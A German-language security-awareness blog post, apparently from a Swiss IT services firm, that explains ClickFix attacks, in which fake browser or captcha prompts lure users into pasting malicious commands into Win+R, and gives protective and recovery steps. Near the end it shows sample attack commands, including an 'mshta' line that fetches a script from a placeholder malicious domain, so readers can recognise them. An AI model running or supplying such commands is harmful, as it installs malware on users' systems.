Direkt zum Inhalt
UCC Pro GmbH Logo
Kontakt

ClickFix: Wenn Du Dir die Malware selbst installierst

SEO-Phishing: manipulierte Suchergebnisse als Falle

Du surfst im Netz und plötzlich erscheint ein Popup: «Fehler in Ihrer Browser-Konfiguration. Um fortzufahren, drücken Sie bitte Win+R, fügen Sie diesen Befehl ein und drücken Sie Enter.» Die Anleitung sieht professionell aus, das Logo passt, der Text ist klar formuliert.

Wenn Du dem folgst, installierst Du Dir eigenhändig Malware auf den Rechner. Genau das ist der Trick. Die Methode heisst ClickFix, und das BACS warnt seit 24. Februar 2026 vor einer wachsenden Welle dieser Angriffe in der Schweiz.

Wie ClickFix funktioniert

Der Trick ist genial in seiner Schlichtheit: Statt dass die Malware versucht, sich heimlich auf Deinen Rechner zu schleichen, gibst Du sie Dir selbst. Mit Deiner eigenen Tastatur. Auf einer Webseite, der Du gerade vertraust.

Schritt für Schritt:

  1. Du landest auf einer kompromittierten oder bösartigen Webseite. Oft über manipulierte Suchergebnisse, Werbeanzeigen, oder eine an sich harmlose Seite, die Schadcode injiziert hat.
  2. Ein Dialog erscheint: «Captcha bestätigen», «Browser-Fehler», «Cookie-Konfiguration aktualisieren». Visuell sieht es nach Standard-Webseiten-Funktionalität aus.
  3. Eine Anleitung folgt: «Drücken Sie Windows-Taste + R, fügen Sie diesen Code ein, drücken Sie Enter.» Der Text wird automatisch in die Zwischenablage kopiert.
  4. Du folgst der Anleitung – und führst damit einen Befehl aus, der eine PowerShell-Sitzung öffnet und Malware aus dem Internet nachlädt und installiert.

Was an dieser Stelle ausgeführt wird, kann von einem Kryptominer (saugt CPU-Leistung ab, kostet Strom) über einen Trojaner (klaut Passwörter und Banking-Daten) bis zur kompletten Übernahme des Systems reichen. Bei Schweizer Vorfällen war oft Banking-Trojaner-Software dabei, mit unmittelbarem Geld-Schaden.

Warum es funktioniert

ClickFix umgeht praktisch alle technischen Schutzmechanismen. Antivirus-Programme prüfen, was auf dem System ausgeführt wird – aber wenn der User selbst powershell.exe startet und einen Befehl eingibt, sieht das wie eine legitime Aktion aus. Browser-Sicherheit prüft Downloads – aber hier wird nichts heruntergeladen, das geprüft werden könnte. Der Befehl wird vom User in die Tastatur eingegeben.

Soziale Komponente: die Anleitung wirkt technisch. Wer mit Computern halbwegs vertraut ist, weiss, dass Win+R tatsächlich der «Ausführen»-Dialog ist und dass Profis manchmal solche Tipps geben. Ein technikfremder Nutzer, der den Schritten folgt, hält das für eine harmlose Browser-Anpassung.

Drei Reflexe, die schützen

1. Niemals Tastenkombinationen oder Befehle ausführen, die eine Webseite Dir vorschlägt. Eine echte Webseite – egal welche – braucht das nie. Browser-Probleme löst man nie über Windows-Run-Befehle. Captcha-Aufgaben sind im Browser zu lösen, nicht ausserhalb.

Wenn eine Webseite Dich auffordert, etwas in der Zwischenablage einzufügen und auszuführen: sofort den Browser-Tab schliessen. Nicht überlegen, nicht «kurz schauen was passiert». Schliessen.

2. Browser sauber halten. Erweiterungen, die Du nicht aktiv brauchst, deinstallieren. Installierte Browser-Erweiterungen bekommen oft mehr Berechtigungen als nötig und sind ein häufiger Einstiegspunkt für Schadcode-Injektionen auf besuchten Seiten.

3. Skepsis bei «spezifischen Anleitungen». Klassische Phishing-Mails sind oft generisch. ClickFix-Seiten dagegen geben präzise technische Anweisungen mit echten Befehlsstrukturen. Genau das macht sie glaubwürdig – und genau das ist das Warnsignal. Wenn eine Webseite Dir konkrete Tastenkombinationen, PowerShell-Befehle oder Windows-Anweisungen gibt, ist das fast immer ein Angriffsversuch.

Was tun, wenn schon ausgeführt

Wenn Du bereits einen Befehl von einer fremden Webseite ausgeführt hast und im Nachhinein zweifelst:

  1. Internetverbindung trennen. Kabel raus, WLAN aus. Damit hat die Malware keine Möglichkeit mehr, weitere Komponenten nachzuladen oder Daten zu exfiltrieren.
  2. Antivirus-Vollscan mit aktuellster Signatur-Datenbank. Falls das Programm Malware findet und entfernt: Glück gehabt. Falls nicht: das schliesst leider nicht aus, dass Malware aktiv ist – moderne Schadsoftware tarnt sich oft.
  3. Bei Verdacht auf Banking-Trojaner: sofort die Bank anrufen und Konten sperren lassen. Online-Banking-Passwörter ändern – aber von einem anderen Gerät aus, nicht vom potenziell infizierten.
  4. Saubere Neuinstallation prüfen. Ein gründlicher Antivirus-Scan ist gut, aber bei Verdacht auf hochwertige Malware ist Neuinstallation des Betriebssystems der einzige verlässliche Weg. Klingt aufwändig – ist es auch. Aber zuverlässiger als Hoffnung.
  5. Passwörter wichtiger Konten ändern: Mail, Banking, soziale Medien. Idealerweise von einem anderen Gerät, bis das eigene wieder vertrauenswürdig ist.

Ein Beispiel-Befehl, damit Du das Muster erkennst

Eine ClickFix-Aufforderung könnte etwa so aussehen:

powershell -nop -w hidden -enc

Übersetzt: starte PowerShell ohne Profile, ohne Konsolen-Fenster, und führe einen Base64-codierten Befehl aus. Dieser codierte Befehl ist der eigentliche Angriff – meist ein Download-Skript, das Malware nachlädt.

Anderes Muster: mshta http://böse-domain.com/script.hta – führt eine HTML-Application direkt aus dem Internet aus. Auch das ist nichts, was eine seriöse Webseite je von Dir verlangen würde.

Drei Sätze zum Mitnehmen

Keine Webseite braucht je, dass Du Tastenkombinationen oder Befehle ausserhalb des Browsers ausführst. Wenn doch eine das verlangt: Tab schliessen, fertig. Bei versehentlich ausgeführten Befehlen: Internet trennen und Vollscan, im Zweifel System neu aufsetzen.

Quelle: NCSC – BACS Bundesamt für Cybersicherheit, Meldung vom 24.02.2026: «ClickFix – Wenn eine vermeintliche Fehlerbehebung Malware installiert» (ncsc.admin.ch).

Brauchst Du Beratung dazu?

Schreib uns kurz, was bei Dir konkret ansteht. Wir melden uns persönlich zurück.

Kontakt aufnehmen
Nach oben scrollen